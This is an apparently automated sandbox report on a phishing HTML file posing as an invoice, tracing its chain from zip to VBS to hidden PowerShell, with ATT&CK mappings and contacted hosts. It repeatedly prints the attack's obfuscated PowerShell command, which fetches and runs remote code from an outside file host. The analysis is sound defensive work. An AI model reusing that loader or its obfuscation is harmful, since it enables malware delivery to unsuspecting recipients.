Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exe | Memory allocated: 1430000 memory reserve | memory write watch
Source: C:\Windows\SysWOW64\unarchiver.exe | Memory allocated: 3310000 memory reserve | memory write watch
Source: C:\Windows\SysWOW64\unarchiver.exe | Memory allocated: 5310000 memory commit | memory reserve | memory write watch
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\unarchiver.exe | Window / User API: threadDelayed 661
Source: C:\Windows\SysWOW64\unarchiver.exe | Window / User API: threadDelayed 9337
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3301
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6526
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6788 | Thread sleep count: 661 > 30
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6788 | Thread sleep time: -330500s >= -30000s
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6788 | Thread sleep count: 9337 > 30
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6788 | Thread sleep time: -4668500s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1428 | Thread sleep count: 3301 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2584 | Thread sleep count: 6526 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6976 | Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6920 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: wscript.exe, 0000000B.00000002.2832972295.000000000583F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWxX
Source: wscript.exe, 0000000B.00000002.2832972295.0000000005875000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2833107787.00000132FE02B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2834598614.00000132FF653000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: cmd.exe, 00000009.00000003.2175375920.0000000003390000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: wscript.exe, 0000000B.00000002.2832972295.000000000583F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWL
Source: svchost.exe, 00000011.00000002.2833018847.00000132FE013000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWHp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\unarchiver.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 54.39.128.117 443Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg" "C:\Users\user\Downloads\faktura_FV2025020660849.zip"Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^^^|%{[char]($_/4)})-join'') ^^^| ^^^&($uNteWVUN) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^|%{[char]($_/4)})-join'') ^| ^&($uNteWVUN) "Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c "echo $($untewvun = $('{7}{5}{6}' -f $('vjjlwexien'.tochararray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^^^|%{[char]($_/4)})-join'') ^^^| ^^^&($untewvun) | c:\windows\syswow64\windowspowershell\v1.0\powershell.exe -window hidden -c -"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $($untewvun = $('{7}{5}{6}' -f $('vjjlwexien'.tochararray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^|%{[char]($_/4)})-join'') ^| ^&($untewvun) "
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c "echo $($untewvun = $('{7}{5}{6}' -f $('vjjlwexien'.tochararray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^^^|%{[char]($_/4)})-join'') ^^^| ^^^&($untewvun) | c:\windows\syswow64\windowspowershell\v1.0\powershell.exe -window hidden -c -"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $($untewvun = $('{7}{5}{6}' -f $('vjjlwexien'.tochararray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^|%{[char]($_/4)})-join'') ^| ^&($untewvun) "Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\unarchiver.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
ATT&CK matrix, tactic columns: Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information111
Scripting
Valid Accounts11
Command and Scripting Interpreter
1
Browser Extensions
111
Process Injection
11
Masquerading
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Exploitation for Client Execution
111
Scripting
1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell
1
DLL Side-Loading
1
Extra Window Memory Injection
41
Virtualization/Sandbox Evasion
Security Account Manager41
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
Process Injection
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Deobfuscate/Decode Files or Information
LSA Secrets1
File and Directory Discovery
SSHKeylogging3
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials22
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
File Deletion
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Extra Window Memory Injection
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Behavior Graph ID: 1637352
Sample: faktura_FV2025020660849.htm_
Startdate: 13/03/2025
Architecture: WINDOWS
Score: 96

Process tree reconstructed from the behavior graph (numbers in brackets are the graph's node ids; trailing numbers after a process name are the graph's count badges):

Sample [2]
  DNS/IP: s4.histats.com; filehost200885.info
  Signatures: Found suspicious ZIP file; Detected javascript redirector / loader; Downloads suspicious files via Chrome; 6 other signatures
  chrome.exe [11] 14
    DNS/IP: 192.168.2.7, 13621, 138, 443 unknown unknown
    Dropped: C:\...\faktura_FV2025020660849.zip (copy), Zip
    unarchiver.exe [19] 4
      cmd.exe [24] 2 2
        Signatures: Wscript starts Powershell (via cmd or directly); Obfuscated command line found
        wscript.exe [30] 14
          DNS/IP: 54.39.128.117, 443, 49705 OVHFR Canada
          Signatures: System process connects to network (likely due to code injection or exploit); Wscript starts Powershell (via cmd or directly); Obfuscated command line found; 2 other signatures
          cmd.exe [38] 1
            Signatures: Wscript starts Powershell (via cmd or directly); Obfuscated command line found
            powershell.exe [41] 15 17
            conhost.exe [43]
            cmd.exe [45] 1
        conhost.exe [34]
      7za.exe [27] 2
        Dropped: C:\Users\user\AppData\...\2025020665304.vbs, ASCII
        conhost.exe [36]
    chrome.exe [21]
      DNS/IP: s4.histats.com 149.56.240.132, 443, 49692 OVHFR Canada; filehost200885.info 156.229.228.198, 13621, 49693, 49694 ONL-HKOCEANNETWORKLIMITEDHK Seychelles; 2 other IPs or domains
  svchost.exe [15] 1 2
    DNS/IP: 127.0.0.1 unknown unknown
  chrome.exe [17]

No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
file:///C:/Users/user/Desktop/faktura_FV2025020660849.html | 0% | Avira URL Cloud | safe
https://s4.histatss$% | 0% | Avira URL Cloud | safe
https://s4.histats.% | 0% | Avira URL Cloud | safe


Name | IP | Active | Malicious | Antivirus Detection | Reputation
filehost200885.info | 156.229.228.198 | true | false | | unknown
s4.histats.com | 149.56.240.132 | true | false | | high
www.google.com | 172.217.18.4 | true | false | | high
_13621._https.filehost200885.info | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://s4.histats.com/stats/0.php?4935988&@f16&@g1&@h1&@i1&@vhttps://histats.com/d_opened | false | | high
file:///C:/Users/user/Desktop/faktura_FV2025020660849.html | true | Avira URL Cloud: safe | unknown
https://s4.histats.com/stats/0.php?4935987&@f16&@g1&@h1&@i1&@vhttps://histats.com/s_opened_TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEzNC4wLjAuMCBTYWZhcmkvNTM3LjM2 | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://g.live.com/odclientsettings/Prod1C: | qmgr.db.17.dr | false | | high
https://histats.com/d_opened= | wscript.exe, 0000000B.00000002.2831181995.00000000033C1000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://s4.histats.com/stat8% | wscript.exe, 0000000B.00000003.1164820664.00000000033C0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/ProdV21C: | svchost.exe, 00000011.00000003.1207118522.00000132FF4E0000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.dr | false | | high
https://s4.histats.com/stats | wscript.exe, 0000000B.00000002.2832180699.00000000038BA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://s4.histatss$% | wscript.exe, 0000000B.00000002.2831181995.00000000033AD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.ver) | svchost.exe, 00000011.00000002.2834516229.00000132FF600000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://s4.histats.com/stas | wscript.exe, 0000000B.00000002.2831181995.00000000033AD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://histats.com/d_openedm | wscript.exe, 0000000B.00000002.2831181995.00000000033C1000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://histats.com/d_opened8% | wscript.exe, 0000000B.00000002.2832972295.000000000585C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://s4.histats.com/ | wscript.exe, 0000000B.00000002.2831181995.00000000033AD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://s4.histats.com/c | wscript.exe, 0000000B.00000002.2831181995.00000000033AD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://s4.histats.% | wscript.exe, 0000000B.00000002.2831181995.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.1164820664.00000000033C0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://histats.com/d_opened | wscript.exe, 0000000B.00000002.2832180699.00000000038BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2831181995.0000000003416000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2831181995.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2833317335.00000000059B3000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://histats.com/d_opened=% | wscript.exe, 0000000B.00000002.2832972295.000000000585C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://s4.histats.com/stats/0.php?4935988& | wscript.exe, 0000000B.00000002.2832180699.00000000038BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2831181995.0000000003416000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2832180699.00000000038B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2831181995.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2831181995.0000000003375000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2833317335.00000000059B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2831181995.000000000340A000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.56.240.132 | s4.histats.com | Canada | 16276 | OVHFR | false
172.217.18.4 | www.google.com | United States | 15169 | GOOGLEUS | false
156.229.228.198 | filehost200885.info | Seychelles | 139086 | ONL-HKOCEANNETWORKLIMITEDHK | false
54.39.128.117 | unknown | Canada | 16276 | OVHFR | true

Private / local IPs:
192.168.2.7
127.0.0.1
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1637352
Start date and time: 2025-03-13 14:55:55 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 23s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowshtmlcookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: faktura_FV2025020660849.html
(renamed file extension from htm_ to html)
Original Sample Name: faktura_FV2025020660849.htm_
Detection: MAL
Classification: mal96.phis.expl.evad.winHTML@43/18@8/6
• Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, TextInputHost.exe
• Excluded IPs from analysis (whitelisted): 142.250.186.174, 142.250.181.227, 142.250.181.238, 142.250.110.84, 142.250.186.78, 142.250.185.174, 172.217.16.206, 142.250.185.110, 88.221.110.121, 172.217.16.142, 142.250.184.206, 142.250.186.142, 23.60.203.209, 142.250.74.195, 34.104.35.123, 216.58.206.78, 142.250.186.110, 142.250.186.67, 23.199.214.10, 216.58.206.46, 172.217.18.110, 142.250.74.206, 172.217.18.14, 142.250.80.46, 173.194.17.198, 20.12.23.50
• Excluded domains from analysis (whitelisted): clients1.google.com, r1.sn-hp57knd6.gvt1.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, r1---sn-hp57knd6.gvt1.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, redirector.gvt1.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net, c.pki.goog
• Not all processes were analyzed; the report is missing behavior information.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
09:57:22 | API Interceptor | 43x Sleep call for process: powershell.exe modified
09:57:23 | API Interceptor | 2x Sleep call for process: svchost.exe modified
09:57:30 | API Interceptor | 3557037x Sleep call for process: unarchiver.exe modified
Match (IP) | Associated Sample Name / URL | Detection | Threat Name
149.56.240.132 | SUS.ps1 | malicious | Unknown
 | https://getwellslogsnowonline.vercel.app/ | malicious | Unknown
 | https://199.188.109.181 | malicious | Unknown
 | http://home45insurance.blogspot.com | malicious | Unknown
 | http://home45insurance.blogspot.com | malicious | Unknown
 | http://manatoki463.net | malicious | Unknown
